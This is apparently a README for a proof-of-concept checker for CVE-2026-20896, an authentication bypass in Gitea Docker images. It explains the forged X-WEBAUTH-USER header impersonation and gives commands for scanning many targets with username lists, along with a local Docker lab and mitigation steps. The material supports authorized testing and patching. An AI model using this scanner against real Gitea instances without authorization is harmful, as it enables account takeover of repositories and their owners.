## https://sploitus.com/exploit?id=B63E3966-43C5-5FF1-BB9C-649838FB209E
# CVE-2026-20896 Gitea Docker Auth Bypass Checker
Authorized red team / pentest operations only.
This repository contains a minimal checker for CVE-2026-20896, an authentication bypass in official Gitea Docker images up to and including `1.26.2` when reverse-proxy authentication is enabled.
## What CVE-2026-20896 Is
Affected Gitea Docker images shipped an `app.ini` template with:
```ini
REVERSE_PROXY_TRUSTED_PROXIES = *
```
When an administrator enabled:
```ini
ENABLE_REVERSE_PROXY_AUTHENTICATION = true
```
Gitea trusted `X-WEBAUTH-USER` from any source IP that could reach the container HTTP port directly. A client that bypassed the intended authenticating reverse proxy could send a single header and impersonate a known or guessable user.
The practical impact is unauthenticated account impersonation. If the guessed user is an administrator, the worst case is full application-level takeover of the Gitea instance and its repositories. Host RCE is environment-dependent and is not claimed by this checker.
Patched versions start at `1.26.3`; upgrading to `1.26.4` or newer is recommended.
## How The PoC Works
The checker:
1. Fetches the target home page.
2. Looks for footer text such as `Powered by Gitea Version: 1.26.4`.
3. Skips testing by default if the parsed version is `>= 1.26.3`.
4. Sends `GET /` requests with `X-WEBAUTH-USER: ` for each supplied username.
5. Reports a hit when the returned page title looks like a logged-in dashboard for that user.
The Go version supports multiple targets, username files, concurrency, timeouts, JSONL output, TLS `--insecure`, `--dry-run`, and `--force`.
## Build
```bash
go build -o gitea-cve-2026-20896-check .
```
No third-party Go dependencies are required.
## Usage
Single target:
```bash
./gitea-cve-2026-20896-check \
--url http://localhost:3000 \
--users admin,gitea_admin,alice
```
Multiple targets and usernames:
```bash
./gitea-cve-2026-20896-check \
--targets targets.txt \
--user-file users.txt \
--concurrency 64 \
--timeout 8s \
--jsonl
```
Dry run:
```bash
./gitea-cve-2026-20896-check \
--url http://localhost:3000 \
--users admin,alice \
--dry-run
```
Bash fallback:
```bash
./poc.sh --url http://localhost:3000 --users admin,alice
```
## Exit Codes
- `0`: at least one vulnerable impersonation was confirmed
- `1`: no vulnerable impersonation was confirmed
- `2`: usage, input, or runtime error
## Local Reproduction Lab
The following lab starts an affected local Gitea container and creates a test user:
```bash
docker run -d --name gitea-cve-2026-20896 \
-p 127.0.0.1:3000:3000 \
-e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
-e GITEA__security__INSTALL_LOCK=true \
gitea/gitea:1.26.2
sleep 15
docker exec --user git gitea-cve-2026-20896 gitea admin user create \
--username alice \
--password 'longpasswordhere1234' \
--email alice@example.test \
--must-change-password=false
./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin
```
Expected positive result:
```text
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"
```
Cleanup:
```bash
docker rm -f gitea-cve-2026-20896
```
## Mitigation
- Upgrade Gitea to `1.26.3` or newer; `1.26.4` or newer is preferred.
- Do not expose the backend Gitea container HTTP port directly to untrusted networks.
- Explicitly configure trusted reverse proxies.
- Keep reverse-proxy authentication disabled unless the network path and proxy trust boundary are understood.
## References
- Gitea advisory:
- Gitea release notes for `1.26.3` / `1.26.4`:
- Fix PR:
- CVE record:
- In-the-wild probing report via The Hacker News / Sysdig telemetry: